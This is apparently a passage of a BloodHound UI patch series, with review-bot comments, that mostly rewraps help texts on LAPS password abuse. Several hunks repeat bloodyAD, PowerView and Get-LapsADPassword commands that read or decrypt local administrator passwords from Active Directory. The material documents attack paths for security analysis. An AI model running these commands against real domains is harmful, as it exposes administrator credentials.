- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -251,16 +253,19 @@ const LinuxAbuse: FC = (
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx index a03165c467..e6506fa46d 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx @@ -144,16 +144,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 49374da97f..d0c0277a02 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -331,8 +331,9 @@ const WindowsAbuse: FC = - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -342,27 +343,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx index 2442949f49..96b57895ae 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx @@ -27,19 +27,18 @@ const General: FC = ({ sourceName, sourceType, targetName }) => { Password Solution (LAPS) on the computer {targetName}.
- For systems using legacy LAPS, the following AD computer object properties are relevant: - - **ms-Mcs-AdmPwd**: The plaintext LAPS password. - - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password expiration time. + For systems using legacy LAPS, the following AD computer object properties are relevant: - + **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password + expiration time. For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: - - **msLAPS-Password**: The plaintext LAPS password. - - **msLAPS-PasswordExpirationTime**: The LAPS password expiration time. - - **msLAPS-EncryptedPassword**: The encrypted LAPS password. - - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. - - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. - - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. + - **msLAPS-Password**: The plaintext LAPS password. - **msLAPS-PasswordExpirationTime**: The LAPS + password expiration time. - **msLAPS-EncryptedPassword**: The encrypted LAPS password. - + **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. - + **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. - + **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx index d29cc06d31..2be67f59cc 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx 
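Review bot: The reflow in this hunk joins the bullet items into running text — `- **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password` now sits on one line — and since JSX collapses whitespace and, as far as I know, Typography does not render `**bold**`, the General tab will show one paragraph with literal asterisks and dashes. The sibling help texts in this same patch put each attribute on its own line without markdown markers, so matching that here (one attribute per line with an explicit line break, e.g. `- ms-Mcs-AdmPwd: The plaintext LAPS password`) keeps the "attributes listed in the General section" pointer from the abuse tabs landing on an unreadable blob. If this text is intentionally markdown and rendered through a markdown component, a comment saying so would stop the next formatter pass from mangling it again.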
@@ -21,14 +21,14 @@ import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = () => { return ( <> - - Read the LAPS password attributes listed in the General section. - + Read the LAPS password attributes listed in the General section. Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx index 5d4fbd1b43..9c3b8b29da 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx @@ -31,16 +31,22 @@ const References: FC = () => { https://adsecurity.org/?p=3164
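Review bot: The sentence "Plaintext attributes can be read using a simple LDAP client" is broader than the bloodyAD example that follows it, which queries only the legacy `ms-mcs-admpwd`/`ms-mcs-admpwdexpirationtime` attributes, while the General section of the same edge lists `msLAPS-Password` as a plaintext Windows LAPS attribute too. Suggest qualifying the lead-in, e.g. `Legacy LAPS plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:`, and pointing the reader to the Windows abuse text for the Windows LAPS attributes the way the WriteDacl and WriteOwner LinuxAbuse hunks already do for the encrypted ones. The same lead-in and example appear in the WriteDacl/LinuxAbuse.tsx and WriteOwner/LinuxAbuse.tsx hunks of this series, so the wording fix applies there as well. The LinuxAbuse component body continues outside this hunk.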
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx index bb0f6edb9c..5f59712188 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx @@ -21,9 +21,7 @@ import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = () => { return ( <> - - Read the LAPS password attributes listed in the General section. - + Read the LAPS password attributes listed in the General section. Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: @@ -34,14 +32,17 @@ const WindowsAbuse: FC = () => { Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx index ecee39a884..2b29680425 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx 
@@ -230,7 +230,8 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password - The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) + password for {targetName}. For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -240,8 +241,9 @@ const LinuxAbuse: FC = ( - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
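Review bot: The rewrapped sentence in WriteDacl/LinuxAbuse.tsx still names the wrong permission: `The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.` is rendered for the WriteDacl edge, which looks like a leftover from the GenericAll help text. The identical line is rewrapped in the WriteOwner/LinuxAbuse.tsx hunk of this series and has the same problem. Suggest naming the permission each file documents, e.g. `The WriteDacl permission allows {sourceName} to obtain the rights needed to retrieve the LAPS (RID 500 administrator) password for {targetName}.` here and the WriteOwner equivalent there. The hunk only changes line wrapping, so this is an existing defect the commit carries forward rather than one it introduces; the enclosing JSX block starts and ends outside the hunk.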
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -251,16 +253,19 @@ const LinuxAbuse: FC = (
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx index d5ee5e9800..9f386d67c6 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx @@ -155,16 +155,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index c5bdb87db4..7880ad1395 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -307,8 +307,9 @@ const WindowsAbuse: FC = - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -318,27 +319,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx index d5380109a7..fc819c339f 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx @@ -250,7 +250,8 @@ const LinuxAbuse: FC = ({ sourceName, targ Retrieve LAPS Password - The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) + password for {targetName}. For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -260,8 +261,9 @@ const LinuxAbuse: FC = ({ sourceName, targ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -271,16 +273,19 @@ const LinuxAbuse: FC = ({ sourceName, targ
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx index 05b24c4fa8..f4b0138634 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx @@ -100,16 +100,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index ce81766ea8..ed99c93d67 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -382,7 +382,8 @@ const WindowsAbuse: FC =
- For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -392,27 +393,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack From 563d444a442dac9cf0b9832cb0cf05fcd448570e Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 12:40:33 +0100 Subject: [PATCH 3/4] fix ReadLAPSPassword General info --- .../HelpTexts/ReadLAPSPassword/General.tsx | 28 +++++++++++++------ 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx index 96b57895ae..9c7db79faa 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx @@ -27,18 +27,28 @@ const General: FC = ({ sourceName, sourceType, targetName }) => { Password Solution (LAPS) on the computer {targetName}.
- For systems using legacy LAPS, the following AD computer object properties are relevant: - - **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password - expiration time. + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
- For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: - - **msLAPS-Password**: The plaintext LAPS password. - **msLAPS-PasswordExpirationTime**: The LAPS - password expiration time. - **msLAPS-EncryptedPassword**: The encrypted LAPS password. - - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. - - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. - - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
); From 3bf265ae401193b2e1f9172748bde3fbfa394092 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 12:52:27 +0100 Subject: [PATCH 4/4] remove unused haslaps property --- .../components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx | 2 +- .../HelpTexts/AllExtendedRights/WindowsAbuse.tsx | 8 +------- 2 files changed, 2 insertions(+), 8 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx index cace7b88e1..8d494a4d68 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx @@ -18,7 +18,7 @@ import { FC } from 'react'; import { EdgeInfoProps } from '../index'; import { Link, Typography } from '@mui/material'; -const LinuxAbuse: FC = ({ sourceName, targetName, targetType, haslaps }) => { +const LinuxAbuse: FC = ({ sourceName, targetName, targetType }) => { switch (targetType) { case 'User': return ( diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx index 62c6bab10e..69b9e6a1ed 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/WindowsAbuse.tsx @@ -18,13 +18,7 @@ import { FC } from 'react'; import { Link, Typography } from '@mui/material'; import { EdgeInfoProps } from '../index'; -const WindowsAbuse: FC = ({ - sourceName, - sourceType, - targetName, - targetType, - haslaps, -}) => { +const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, targetType }) => { switch (targetType) { case 'User': return (
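Review bot: The rebuilt attribute list in ReadLAPSPassword/General.tsx presents the expiration-time attributes alongside the password attributes without saying which of them the ReadLAPSPassword right actually protects. If I read the LAPS schema correctly, `ms-Mcs-AdmPwdExpirationTime` and `msLAPS-PasswordExpirationTime` are ordinary, non-confidential attributes, which is also why the bloodyAD examples elsewhere in this series filter on `ms-mcs-admpwdexpirationtime`, whereas the password attributes are the ones gated by this edge; a short sentence after the lists, such as `Only the password attributes are protected by the LAPS read right; the expiration-time attributes are readable by ordinary domain principals.` would make the edge's meaning clearer to the analyst, subject to confirming that claim against the schema. The surrounding General component starts outside this hunk.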
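Review bot: With `haslaps` dropped from the destructuring in both AllExtendedRights components, nothing left in these files distinguishes computer targets that have LAPS from those that do not, so the Retrieve LAPS Password guidance for the Computer case is presumably now rendered for every computer target. If that is intended, for instance because the flag only reflects legacy LAPS and this series adds Windows LAPS coverage, the reason is worth recording next to the signature, e.g. `// haslaps is deliberately not consumed: LAPS guidance is shown for every computer target`; if it is not, restoring the prop and the conditional it used to feed would be the fix. The `EdgeInfoProps` type, which presumably still declares `haslaps`, is outside both hunks, and both component bodies continue past them.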